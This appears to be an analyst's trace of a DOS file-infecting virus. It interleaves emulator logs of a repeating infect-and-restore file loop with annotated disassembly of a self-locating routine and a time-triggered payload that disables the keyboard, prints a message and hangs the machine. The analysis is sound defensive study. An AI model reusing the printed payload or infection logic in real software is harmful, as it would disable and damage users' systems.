0x12a84: call 0x22a4e  ; helper again after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
; NOTE(review): the lines below belong to another routine that the window truncates.
; pop si / sub si, 6 looks like a self-locating base-address computation - confirm.
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:46.120210801Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:46.130058905Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:46.133013075Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:46.140394406Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:46.142359965Z 62 PC: 12b64 | Close file
2018-12-25T12:27:46.15129732Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:46.161822552Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.16461747Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.166446146Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.172866662Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.184062428Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.191666772Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.205419593Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.212333243Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.214619442Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.217201216Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.225968647Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.227623111Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.235335936Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.236883642Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.245492753Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.256311314Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.259124335Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.260422378Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.267511874Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.278197763Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.285719379Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.288321638Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.295534309Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.297430456Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.301256228Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.306943561Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.308073011Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.312782636Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.314322114Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.319671434Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.325878431Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.328127993Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.328916618Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.332425617Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.339127493Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.351795974Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.353326181Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.361310732Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.36290855Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.366362068Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.376482863Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.378070148Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.385284204Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.396899083Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.411510727Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.422373682Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.425502542Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.427460638Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.434491779Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.445379196Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.453736614Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.455414341Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.462581312Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.464964504Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.467641342Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.476940935Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.479076748Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.486409164Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.488220489Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.498801504Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.509885903Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.512729226Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.514258397Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.52067064Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.53152984Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.539302865Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.54107816Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.548216138Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.549976991Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.553132986Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.564102326Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.565666965Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.573969659Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.575748274Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.585299986Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.597466932Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.600417333Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.60158004Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.608288022Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.619179691Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.632441493Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.634696353Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.641900371Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:46.64348786Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:46.646405901Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:46.655828665Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:46.657851165Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:46.665044495Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.667002213Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.67549579Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.686120637Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.690244341Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:46.691502602Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:46.69776766Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:46.709123979Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:46.716372603Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:46.717766837Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:46.725644022Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:46.727191639Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:46.734954972Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:46.746628037Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:46.749322028Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:46.75648188Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:46.763332768Z 78 PC: 12b95 | Find first file
; Analyst annotation: disassembly window that starts where the "Get time" call
; (op 44 = INT 21h AH=2Ch) returns. DOS hands back CH = hour and CL = minute, so
; the first instruction is a time trigger: the payload runs only when hour == minute.
; In this run the next logged call is "Set disk transfer address" at 12ad4, which
; suggests the branch was not taken. That is consistent with the Hour 0 / Min 1
; settings in the JSON line ahead of this run, if that line configures it - confirm.
2018-12-25T12:27:46.769680463Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl  ; trigger check: hour == minute?
0x12cc4: je 0x12cc7  ; equal -> payload at 0x12cc7
0x12cc6: ret  ; not equal -> return with no visible effect
0x12cc7: cli  ; interrupts off around the controller write
0x12cc8: mov al, 0xad  ; 0xAD = 8042 keyboard-controller "disable keyboard" command
0x12cca: out 0x64, al  ; port 0x64 = controller command port; keystrokes stop reaching the system
0x12ccc: nop
0x12ccd: sti  ; interrupts back on so DOS can print
0x12cce: mov dx, di
0x12cd0: add dx, 0x215  ; DX = DI + 0x215, the message offset (DI is presumably the code's base address - confirm)
0x12cd4: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9  ; jumps to itself with interrupts disabled: the machine hangs until reset
; NOTE(review): everything below is unreachable after the self-jump and is probably
; data swept up by the linear disassembler. `aas` encodes as 0x3F ('?'), so this run
; looks like a wildcard/placeholder field rather than code - confirm against the raw bytes.
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:46.772035828Z 26 PC: 12ad4 | Set disk transfer address